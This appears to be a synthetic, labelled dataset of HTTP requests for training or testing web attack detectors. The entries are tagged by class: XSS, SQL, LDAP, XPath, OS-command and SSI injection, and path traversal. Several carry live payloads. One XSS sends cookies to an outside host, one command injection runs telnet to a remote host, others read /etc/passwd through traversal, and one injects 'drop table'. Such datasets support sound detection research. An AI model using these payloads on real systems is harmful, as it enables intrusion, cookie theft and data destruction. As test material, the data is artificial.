User-Agent: Mozilla/8.5 (Windows; U; Windows NT 2.6; eS-6u; rv:6.7.6) Gecko/66989641
UA-CPU: Sparc
UA-OS: Win98
UA-Pixels: 015x0585
Via: 5.4 www.atteo.shtml
Transfer-Encoding: gzip
Upgrade: jxf/7.0, xtlsth/8.7
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

i8yanie5ooatewr=6&aAr6aeofo=eea)(    |   (ail0=*)&9oentarceedAs=t$]8insertzunionmtelnet:i>ho

End - Id: 36914
Start - Id: 46533
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: www.6uh0nilcsp.biz:3
Connection: close
Accept: text/plain, text/plain
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: 7-nd, muht-eonotrp;q=0.9
Cache-Control: max-stale
Client-ip: 246.28.222.74
Cookie: titEncrriH3=9wfxnshz;wqornR=jt9=efOinag;RsB9yr=uel d;datnroeuRtoy=al6/eyoimg>'i
Cookie2: $Version="896"
Date: Fri, 25 Jul 08 13:25:07 CET
ETag: "aNVJT2lKpqFCO9DMA"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 27 Nov 05 11:09:58 CET
If-Unmodified-Since: Wed, 24 May 06 17:59:03 UTC
If-Match: "9oYjg2GYAoSOmeeT-f"
If-None-Match: "--MkXcQZKkE5hke"
If-Range: *
Max-Forwards: 2
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: nr1ti raeureu=fttsc
Range: 36325-
Referer: /ntTaup.avi
TE: trailers
Trailer: If-None-Match
User-Agent: fUIh2d- http://www.eczau18.org
UA-CPU: x86
UA-Disp: 9426,1336,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 139x000
Via: FTP/4.1 www.usAoaoei.jpeg, 6.2 8.43.235.100:254
Transfer-Encoding: compress
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46533
Start - Id: 37137
class: LdapInjection
GET /ttOgsncpi/nroNtl/ezLH/8notacbggayof4dete0S.nsf?f_panv3=37490&bdkcj4Dz.=%29+++%28++%7C+++%28displayName%3Dhad*%29++++%28name++%3D++++had*+%29%28+++mail%3Dhad*+++%29 HTTP/1.0
Host: www.cE2oree.uk
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: u372EHht-ucitR, rrwr5e-t, hn-nLsun93g
Cache-Control: max-age=226
Client-ip: 249.30.190.230
Cookie: sa8lOfee=3507015;ype=fsezmn9nrlAd
Cookie2: $Version="980"
Date: Fri, 20 Jun 08 07:28:11 GMT
ETag: "Rits1UwssAAAZBA"
Expect: alsou
From: ke6iat@otEmem.org
If-Modified-Since: Sun, 21 Nov 04 22:14:33 CET
If-Unmodified-Since: Mon, 04 Feb 08 05:05:30 UTC
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: "9sZm3-xP@SjbYoETlP"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.7
Pragma: sd96=boUOell
Proxy-Authorization: NTLM d2FvU3JvaXRDZGNlSWhlbk9wRWVjdGJlb2hrcmVjZWQ=
Authorization: y9ce mwiri0s=oayAEdre
Range: 4-85,-36816,7445-3
Referer: /bqqdg/ueTEt4z.avi
TE: chunked,deflate;q=0.5,gzip;q=0.1
Trailer: Accept-Language
User-Agent: asrhn9FiuiemE
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: iEile/1.9 66.241.78.238, 6.8 www.iBIi.html, FTP/3.8 86.153.116.8
Transfer-Encoding: h1qs; t6eeri7=mmse
Upgrade: wmql/6.4, spti/9.8, omtd/7.6, Heei/8.4
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 84.40.27.181
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37137
Start - Id: 47066
class: XSS
GET /sstxanqih/ii5brcz12E3goe/h1tQGLq6D/inA5r1uocvdeanY/..Zlinclude-0B2QSx5Z/jsnn/FkrYXFOD/75qga6Ep2Jmn.php3?EweeRohetn=%3Cimg+src++++%3D++%22+livescript%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.trorar.com%2Fcgi-bin%2Fnirema.cgi%27%2Bdocument.cookie%29%3B%5D+%22++++%3E HTTP/1.1
Host: 45.73.138.18
Connection: hhirj
Accept: image/*;q=0.4, audio/*;q=0.9
Accept-Charset: koi8, windows-1254, iso-8859-4;q=0.6, koi8-r;q=0.6, x-mac-ce
Accept-Encoding: gzip, deflate;q=0.8, gzip;q=0.3
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 41.216.107.13
Cookie: nfnsA=wgetfrommochav;0firetiionta= uelhy 8 ypBr;ienR=lorehioe1e
Cookie2: $Version="5"
Date: Wed, 01 Jul 09 11:42:07 GMT
ETag: W/"kR45JZ_ktO5@vv_3fZ"
Expect: 100-continue
From: l5ga@0acwrnnsyp.biz
If-Modified-Since: Mon, 05 Jul 04 17:00:23 UTC
If-Unmodified-Since: Mon, 18 Jan 10 24:41:25 UTC
If-Match: *
If-None-Match: "0XAYx1qjO7L1yBADR-v"
If-Range: *
Max-Forwards: 3
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM dGJ0b2VjdDBhdG1zb3V5dGx1b2V1aWJzc0s2MXpobmliYXRoZWVpbw==
Authorization: ei4zD latrrct=Cl2nui
Range: 42191-21573,0-729,-0
Referer: http://ohPid.st/9tsp/ehNwu.wav
TE: trailers,gzip;q=0.4,deflate;q=0.1
Trailer: Via
User-Agent: Mozilla/7.2 (X11; U; Open BSD i586 2.7; ed-nh; rv:5.2.1) Gecko/38863751
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 987x1282
Via: 6.8 www.yxar.jpeg, 7.7 123.64.215.33
Transfer-Encoding: compress
Upgrade: cilvd/3.4
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 240.93.48.210
X-Serial-Number: 9140776636485
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47066
Start - Id: 43375
class: OsCommanding
GET /iYy5replaceueF/toaedStgeZ/gooiahm8m.tiff?stade=924&xsaBaDiMacas=an%3Et%5Bt&efmaneleenlob=%5C%22++%5C%3B++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+www.isisndve.com++++33149+++++%3B&duhybo=2Ps&A7orfehovnnecd=73345&lcnprdep=2199&aeriExaw=47165&lhiupr=d+%28ftpst0acssaz HTTP/1.0
Host: 169.236.20.208
Connection: efeA1
Accept: application/zip, text/*;q=0.2, image/*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, identity;q=0.7, identity, gzip, gzip;q=0.6
Accept-Language: *;q=0.4
Cache-Control: max-stale=122
Client-ip: 255.185.181.53
Cookie: tZ=l;1agn3suao=r<nph-;onerem=ies
Cookie2: $Version="667"
Date: Mon, 11 May 09 05:36:02 GMT
ETag: "t_0bP8amfnwUL9KrdCI"
Expect: aoukreuC
From: utidoe@qznd.net
If-Modified-Since: Sun, 25 Jul 04 09:15:43 CET
If-Unmodified-Since: Wed, 11 Jun 08 23:05:48 UTC
If-Match: *
If-None-Match: "0@9Cikn7V26YsKoNm"
If-Range: Tue, 04 Oct 05 03:12:30 CET
Max-Forwards: 26
MIME-Version: 2.7
Pragma: 6i7xh='n9he'
Proxy-Authorization: Digest uri=http://www.aSgm.net/onpfm.pdf
Authorization: stt7m heees=nnhm3bi
Range: 025-,561060-
Referer: http://www.aalrgkah.uk/elrgbq/8dlheHe/saiyl.htm
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/9.7 (X11; U; Linux i586 2.7; eh-ti; rv:8.9.7) Gecko/81643262
UA-CPU: Sparc
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9788x122
Via: 4.6 www.es6suac.tiff:84059, HTTP/4.0 93.210.10.245:8
Transfer-Encoding: identity
Upgrade: HaT6gy/0.1
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 75.64.37.214
X-Serial-Number: 68319129
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43375
Start - Id: 49108
class: XPathInjection
GET /4osxusgx7heor.bin?etautfB=exechnph-tprgroup+by&eraidmku=csO3%27+++++or+++++6ho%2Fs9%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D3%5D++or++++%27iel%27%3D++++%27&3_VVgb6telnetUa=9ashalfromaD8%7Cym&bgsoundlqDIw76190=077134039&tDosoihChnws=8&pRQ-ONE=t0E&it4=582600172 HTTP/1.0
Host: 137.2.160.126
Connection: close
Accept: application/postscript, audio/basic;q=0.5, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ns-fEaahcCa, 0tsiu-i;q=0.7, A5npSu0-aeime0, 08qcua-a, At3gtes3-cI
Cache-Control: ephrtr='dott'
Client-ip: 28.123.132.190
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Sun, 11 Jan 09 21:08:00 CET
ETag: "aJP_ykVHbIdAGXuNdz"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Mon, 14 Feb 05 08:13:39 GMT
If-Unmodified-Since: Sat, 06 Dec 08 04:43:18 GMT
If-Match: "xOdDzZBstjtmPsNj"
If-None-Match: *
If-Range: Mon, 30 Aug 04 16:11:58 UTC
Max-Forwards: 18
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: Basic YXRpZm46YW1uRWhtbg==
Range: 21992-101995,769527-91853,911330-
Referer: http://eqhcyre.de/EaledTsd/odctcrk.asmx
TE: trailers,trailers,chunked;q=0.9
Trailer: Referer
User-Agent: otingzirdin
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9298x371
Via: 2.0 www.h9e5j.html:47729, FTP/7.3 234.213.46.162
Transfer-Encoding: compress
Upgrade: ftis/8.4, aiar9w/5.5, wticg/0.0
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49108
Start - Id: 35463
class: SqlInjection
POST /dsY5yCN/i4vtWWtMxrskl46/on.shtml? HTTP/1.1
Content-Length: 139
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Host: 7.21.50.204
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-2022-jp, x-mac-japanese, us-ascii
Accept-Encoding: 
Cache-Control: no-transform
Client-ip: 144.38.222.59
Cookie: orjnieoorah=';  drop     table     atwqotoetto
If-Modified-Since: Tue, 19 Feb 08 18:42:22 UTC
Referer: /mrcsnrme/2eum/nExnu/6edt1.php4
User-Agent: lduini/2.0.1.1

eeaootoepad=eval&ftp0Bq=ehZKMSC&sMgieE2rebxpast=eCpKEq&fos3cssfaeUnsw=nkdr9sb<uf&enex2pia=978546&xPKstdinc4kR=98&tnr9fe=fFednaonie8reorhe

End - Id: 35463
Start - Id: 35113
class: SqlInjection
GET /NEeygnmEe/eS/22mPzlYM/rhD/i8W6-7Zx5P/ecyLew5OPkH7jR97Nmq/bhfhtsehrfAf/deueer8eoqToati3tMbn/rneujalc/u4oersCihrhlq/eDxlZnvfob..htm?gC=2992&Mk.s5TftpEgTWK=rxlikesali2tsguhe%3Ab&aV=aMtAztv&et0tMtfy=x%24mps&Ri6mdofn=+%40t&hentbrmsetq=73&_D5e-Ogr1shutdown=apz%40ClQ&N4eyDulsMrwwte=titnErniihn&Jee=9985&rnmenaSVaLst0a=hAKC4Ckusx&lsc4vRnwwonaF=nhtRedwb1umochaiib&6eepxrjri9n4r=oUwrFRL&47=2492632&mEhebi=780988&fr8t0N=inwindow.open7n7ho+tt HTTP/1.1
Host: www.sdhad.be
Connection: n8se2N
Accept: video/*, application/rtf, text/*;q=0.2
Accept-Encoding: *
Accept-Language: oqaieOn-oeipesA;q=0.3, tusenq-dtel3, nyr67H1-twxRtt;q=0.2
Cache-Control: no-transform
Cookie: Ofarrhnrynwcea=e9r>s;nbieEii6=OR     'ip7ar'  LIKE  'Sim%';olows6h=uet;3nhE=e nin;6reela5dooael=e@YF.72;Qseuhdoetm2wdAc=8
Date: Tue, 05 Oct 04 05:22:52 UTC
Expect: rnxs=ijNnlj
If-Unmodified-Since: Fri, 27 Feb 09 14:33:19 GMT
If-None-Match: *
Max-Forwards: 7772
Pragma: hqWee9e='twf'
Range: -444440,-61,83757-326236
Referer: http://eESasdv.fr/hrea/5tnO.msf
TE: trailers,trailers,gzip
User-Agent: Mozilla/8.9 (Windows; U; Windows NT 2.4; hh-ae; rv:6.3.0) Gecko/79997067
Via: 4.6 57.40.148.33, HTTP/5.2 70.205.108.212
Warning: 502 24.120.21.238 "q9oNeeeytxzpYewo" 
X-Serial-Number: 2453467353146
----: ----------

null

End - Id: 35113
Start - Id: 35840
class: XPathInjection
GET /epDrnt4oydenkmenbte/sSatr8h/cOgTkssucuZsP/mpo4dorRaeptaaxstnE/aqzCLGqe.php3?orfje4lt=samacn0&bdehodAp7ttas=65989486&MlpdfebiltxglA=yG1hLJa-V.rU&atr=a+let&6333.2o=ogt2eaCt&Dnunp0ntm=0lEllE&inputQbodymcS=3&toizit7eyse2=15699699&ieBaat=58388266&Erembgn=%28i++++%3C+count%28ue3jo%2Fchild%3A%3Atext%28%29%29+++and+++++j+++%3C+count%28rtua%2Fchild%3A%3Acomment%28%29%29+and++++k+%3C++count%28le%2Fchild%3A%3A*%29+++++%29&02IEMJuc_LZj=ejpassthruR%5C%3Aonb8lnia-&orqo8t=iRgrLc9G&qhs65iIgzmu=33795 HTTP/1.0
Host: www.eo1neef.cz
Connection: tennbo
Accept: application/rtf
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: gvnen4es-sxdoeAlt;q=0.5, mAfrmxh0-f, tu5-batoriaa;q=0.7, lh-lt;q=0.6, tta-den
Cache-Control: no-store
Client-ip: 48.181.108.67
Cookie: rtbhesl=et2irxr2hgsmew7hMX;sk=l 5a);hyeSoe='uce o nEre;hs9tnma=r?c@;iAughsa=4;ea=akW@57JLwM
Cookie2: $Version="003"
Date: Wed, 19 Nov 08 19:09:35 CET
ETag: "aq3Kr@.usbQW67kgtl"
Expect: 100-continue
From: t6Hzyl@dtgtOents.biz
If-Modified-Since: Sat, 25 Sep 04 13:15:03 CET
If-Unmodified-Since: Sat, 13 Mar 10 02:51:36 GMT
If-Match: "m5BkrIhqM94iGfrx"
If-None-Match: "Q.FWvqyKcZ9A1-P0qGi"
If-Range: *
Max-Forwards: 33
MIME-Version: 8.2
Pragma: Nr='jxxc'
Proxy-Authorization: do1ee dtreee=is8turnl
Authorization: Digest username="4dg6s4u"
Range: 77-,-9
Referer: /lotueio4/6Abm8aa/Obmg4jc/usvs/0aNso.php3
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: ohrhtnIe9/3.8
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Pixels: 4135x5853
Via: th9os/5.5 150.159.225.250, HTTP/9.9 www.aleoNiT.htm:91
Transfer-Encoding: identity
Upgrade: ml1/5.5, VeaAtn/8.1, thmg/1.6, lbedtw/3.5
Warning: 327 215.134.162.135 "tumeaatn0ePv5noa" "Fri, 09 Dec 05 05:29:32 UTC"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 4375504120
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35840
Start - Id: 40467
class: SSI
GET /eOe8GAtEr/ch_Dno5bns0e..h/mlhotis4lscheii.tiff?cchnt8=%3C%21--++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E HTTP/1.0
Host: 94.15.102.32:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-japanese, gb2312, cp-950
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 157.160.254.142
Cookie: ar=er
Cookie2: $Version="35"
Date: Sun, 10 Apr 05 01:00:43 GMT
ETag: W/"CWkiioo0WdACHhp"
Expect: gacnoeoo
From: Yma7@5eefcOthto.biz
If-Modified-Since: Sat, 20 Jun 09 05:00:51 CET
If-Unmodified-Since: Sat, 13 Dec 08 04:18:16 CET
If-Match: "t.eK5Fx_sD88QKJ4u"
If-None-Match: *
If-Range: "n.x5zR7bnkS5zhEwH"
Max-Forwards: 245
MIME-Version: 6.5
Pragma: aH=jolMs
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: NTLM NHJpdE9vbG5yYWU5ZTduMGVsM3NldGxndFhhbmdoYm9vOXR0cGVo
Range: 6740-758,0802-
Referer: http://www.ytetY.be/bHse/ChSojsod.shtml
TE: gzip;q=0.1
Trailer: Date
User-Agent: adonee
UA-CPU: PowerPC
UA-Disp: 0480,927,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 025x185
Via: lt2es/3.1 102.20.142.105, 4.3 www.roqsngy.jpg, 8.6 www.nmaer.html
Transfer-Encoding: snI0d; sahiisha=erert
Upgrade: euiyir/6.1, hfa8er/9.8, bIRueh/1.1
Warning: 432 242.146.77.146 "uIlneRnawNo7ctortf" 
X-Forwarded-For: 246.41.137.5
X-Serial-Number: 98565372421828
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 40467
Start - Id: 49601
class: XPathInjection
GET /EtimbnS/ad6ten5b.jsp?GI1xtermTnywPyL=267077&pemeWehaD=583&ewinnt3nsSuTNvpositionA=mednrtRra&ZSNBAjbroB=9++or+++1%3C+dsc%2FdmA%2FD%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D3%5D+or+++++1%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: 155.107.94.169
Connection: nlwhws
Accept: text/*;q=0.3, application/rtf;q=0.4, audio/*
Accept-Charset: iso-8859-7;q=0.3, utf-8;q=0.8, windows-1257, euc-jp;q=0.8
Accept-Encoding: 
Accept-Language: 6leeRe-rtrpAR;q=0.3, mdnoC-ahyhnTt, tti-6T8eedf;q=0.5
Cache-Control: no-cache
Client-ip: 24.252.164.144
Cookie: telnetOZx='aite;Q@Kg=76;oyj-mSy9POu=nhlseNn'iHutao
Cookie2: $Version="785"
Date: Mon, 09 Jun 08 11:09:45 CET
ETag: "OmYn45rY5Z5qYtyD0"
Expect: 100-continue
From: tdaOt@esEtnmNs.it
If-Modified-Since: Fri, 09 Nov 07 03:06:27 GMT
If-Unmodified-Since: Sun, 13 Jul 08 14:45:52 GMT
If-Match: "eHujKSEypHPDUITto0m@"
If-None-Match: *
If-Range: Tue, 25 Mar 08 02:09:17 UTC
Max-Forwards: 01
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM c255bzF0ZndMd3liYThvZWlvb25QZWEzbnR6bG10cnR0ZA==
Authorization: Basic MGNudHNPZjphamF1
Range: 7852-
Referer: http://www.meoIwrss.ch/ioednlot.cfm
TE: gzip;q=0.4,deflate
Trailer: Range
User-Agent: xnva/0.5.8.9.0
UA-CPU: StrongARM
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 122x540
Via: baa1iu/3.2 www.cewhy.gif:6874
Transfer-Encoding: teeth; aohrR1ca=tdssarr
Upgrade: add/2.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49601
Start - Id: 40313
class: SSI
GET /bNaenwcttergnm4l8Cbt/4arsixrl.asmx?iqhOnlEeaneuo=HssT&xZQeCN=%3C%21--+%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5Cbdnbmhroa%5CoeO2tAaEie%5Ctoon.exe+++d%3A%5Csc9movedO%5Cwww.asal.org%5Ctfae3t%5Cdatabase.mdb++%2Fx++++exporttofoxpro%22--%3E HTTP/1.0
Host: 91.42.96.93:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 189.175.1.221
Cookie: atoaiaoe=Mpasswdranbiaulgaaccept me];9eewbpir=ein6z;3bodyBKHdZZE=8138;etnlo=6
Cookie2: $Version="373"
Date: Tue, 22 Jun 04 22:45:15 GMT
ETag: "r7UE_IeZtKrz.gkK2"
Expect: 100-continue
From: eeom@9Ehl.gov
If-Modified-Since: Wed, 18 Jun 08 09:47:35 CET
If-Unmodified-Since: Wed, 15 Jul 09 01:42:24 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 460
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic aW4waXNtaHM6M2F1bnNT
Authorization: NTLM YVJzaXJuYXNlb2lubm50TXNlVG5leWF1ZW9sZWFmY3VF
Range: -2115,0045-233,-51
Referer: http://www.hldsce.net/stte/pheBh/Thiaem/ojUn.conf
TE: gzip;q=0.4,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.6 (compatible; Konqueror/4.0; Mac OS X; 1ocena; OHecg54i)
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0982x101
Via: FTP/3.3 www.1aseiet.css:87, 5.9 www.esrasde.tiff, 8.9 www.29i8s.gif
Transfer-Encoding: deflate
Upgrade: doiAa/8.2, ttps1j/4.1, hje/0.9, idg/3.2
Warning: 569 252.52.85.196 "izcvnbou" "Wed, 03 May 06 17:08:51 CET"
X-Forwarded-For: 232.141.193.11
X-Serial-Number: 475557970524
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40313
Start - Id: 38664
class: LdapInjection
GET /s.LsNUjGP/lhTx5@d/Olyltje/nJ/aPP3jOXQ1G/mtdUa4t/arhaa6ege/t@f@JCE1M3eroJ73x_/iyL/ifQ/lqP.gif?Bkefe=3174&c2naIiGiHs=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.mmrdd.cz
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.5, isiri-3342, euc-tw, hz-gb-2312;q=0.2, euc-jp;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 4.62.251.210
Cookie: 5bsectEct2r=060
Cookie2: $Version="896"
Date: Tue, 26 Oct 04 14:24:46 GMT
ETag: W/"acs6KsAwqRjXZb8puH"
Expect: aero=c3tei1ta;Aetl
From: 0dbnE@pDEweao.biz
If-Modified-Since: Mon, 13 Dec 04 18:14:55 CET
If-Unmodified-Since: Tue, 16 Jun 09 22:18:01 CET
If-Match: *
If-None-Match: "NeoD1gfKW@JvORts_pF"
If-Range: "zYW1-9b-.SPTKEB"
Max-Forwards: 2
MIME-Version: 9.7
Pragma: onearteh=ml1zn
Authorization: NTLM ZWdkOG1ubmxpZXNiZWVOcmRPaWNldFRua29zb25lc2Y=
Range: -3789,-5,300-00360
Referer: /nnCew/urd9nicE/st9bi/slnca/u5en.tiff
TE: gzip,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.5 (X11; U; Linux i586 1.3; lf-2n; rv:1.2.0) Gecko/34601935
UA-OS: Solaris
Via: 2.8 www.zttowi.css
Transfer-Encoding: gzip
----: -------------------

null

End - Id: 38664
Start - Id: 46464
class: PathTransversal
PUT /r4divI98Is0R-BT4/iupkiPiInI.BG7zZ@s/fRURZTsTM_7UdKXP/ahp.E9bMZ.nsf? HTTP/1.1
Content-Length: 214
Content-Language: eaf4ki
Content-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Host: 141.191.188.149
Connection: close
Accept: */*
Accept-Charset: big5;q=0.9, x-mac-icelandic;q=0.1, isiri-3342;q=0.9, koi8-r;q=0.8
Accept-Encoding: *;q=0.7
Cache-Control: no-cache
Cookie: ieadnwxejr7nb=a;pONtsMdVgm9=nscript6iE;osT;hnorn=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Date: Thu, 30 Jun 05 14:44:11 CET
If-Modified-Since: Fri, 23 Jan 09 20:48:42 CET
If-Match: *
If-Range: "RnSuagcU1ZTHV.S"
Referer: /irg9/zeteoti.jsp
User-Agent: Mozilla/7.6 (Windows; U; WinNT 2.5; oS-ny; rv:0.0.4) Gecko/55322266
Transfer-Encoding: compress

oazOoZs=6954089645&ric=eunzload&b9coissy2kethrm=l tt&isxlo=148897&salnSus=9smp&CEets8bcts7h=ktoa&oEiia=nv~rneiie&reeinwusdrU=9seruat5iwsgta4edm&evcdt0wO=l6ZlT&ce9abdRys2e6e=n<9?epaneeaen&9ekluwow0es=201011979

End - Id: 46464
Start - Id: 45326
class: PathTransversal
GET /lj74.0pq17e-rasl/fgldh4hNnmTdeehritgg/Yp9RZX4MLiVYt/sudgstbisrhaeeeeef/nqh/iV_jWYp/o5tajtYu.NUBS6/iberaionih9vo/access_log70OgDHIdnGfZsock_streamchild/5m/onpnteoEmltlygonI.shtml? HTTP/1.0
Host: www.elhhSaw.net
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.2, euc-tw, koi8-r, x-mac-japanese, iso-10646-ucs-2
Accept-Encoding: identity, compress, compress;q=0.4, identity;q=0.9, deflate
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 212.54.201.4
Cookie: 8rlgOdnl=hJlsxG;zmnerinaetO=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini;ronceoiep3b=-Ly'1smsve'telnetdaubin6 (b
Cookie2: $Version="8"
Date: Mon, 25 Oct 04 03:09:35 UTC
ETag: "uLxITG0Xh_--WJl9sI4"
Expect: 06bu
If-Modified-Since: Sun, 24 Aug 08 20:06:18 GMT
If-Unmodified-Since: Wed, 06 Dec 06 10:25:40 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Nov 04 15:26:32 GMT
Max-Forwards: 1
Pragma: rtoltgi='eojctr'
Proxy-Authorization: Digest response="793A8bCE0CAdf24bBc6AF425F082f32a"
Authorization: Basic NVM4RTdkbjoyRHJsZW44
Range: -084,6-
Referer: http://www.te2nEEE.de/nlCleem/ribsSr/ne4mx0/xoo0an.gz
TE: trailers,trailers
User-Agent: e5twttaaeatxidek5gta
UA-CPU: x86
UA-Disp: 2781,460,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6710x724
Via: HTTP/6.6 www.axc8rjlf.png, FTP/8.0 www.4eiE.htm, 9.9 www.cnuie.gif
Transfer-Encoding: deflate
Upgrade: rnie/5.1, Tob3to/6.1, sna9re/2.7, noa/6.3, moetu/9.8
Warning: 070 248.147.23.161:680 "AanaRtuucm" 
X-Serial-Number: 838229
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45326
Start - Id: 35147
class: SqlInjection
POST /e0.nsf? HTTP/1.1
Content-Length: 172
Content-Language: lA,tunefy
Content-Encoding: deflate
Content-Location: http://www.bsaoma.cz/eoto/dejvgf/Tafif/garddd.jsp
Content-MD5: aTNob21xOXNMNk9tVGh0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Oct 05 23:49:39 CET
Last-Modified: Sat, 24 May 08 09:28:07 UTC
Host: 184.178.192.228
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-cyrillic;q=0.9, macintosh;q=0.6
Accept-Encoding: 
Accept-Language: ui5ineh-eists6s;q=0.9, ed1Bci-esthseai;q=0.0, mig-Idvdaaud, gtgRt-dcLeiemf, clsedf53-hudt;q=0.2
Cache-Control: max-age=6
Client-ip: 104.27.173.11
Cookie: ptsEdzns5pc=526149
Cookie2: $Version="70"
Date: Sun, 08 Jul 07 11:26:49 UTC
ETag: W/"98S_zUCS1aSpT_Sf"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Sun, 22 Jan 06 09:10:46 UTC
If-Match: *
If-None-Match: "GxGrghoiNRTNfOd1Zf"
If-Range: Tue, 02 Oct 07 09:42:20 CET
Max-Forwards: 501
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: 7iitOy aipr=ieNad
Range: 63-383,700-,-5
Referer: /idor/nl33hre.css
TE: trailers,trailers,trailers
User-Agent: Aeecyrnvc (nfbCyLSoHh)
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
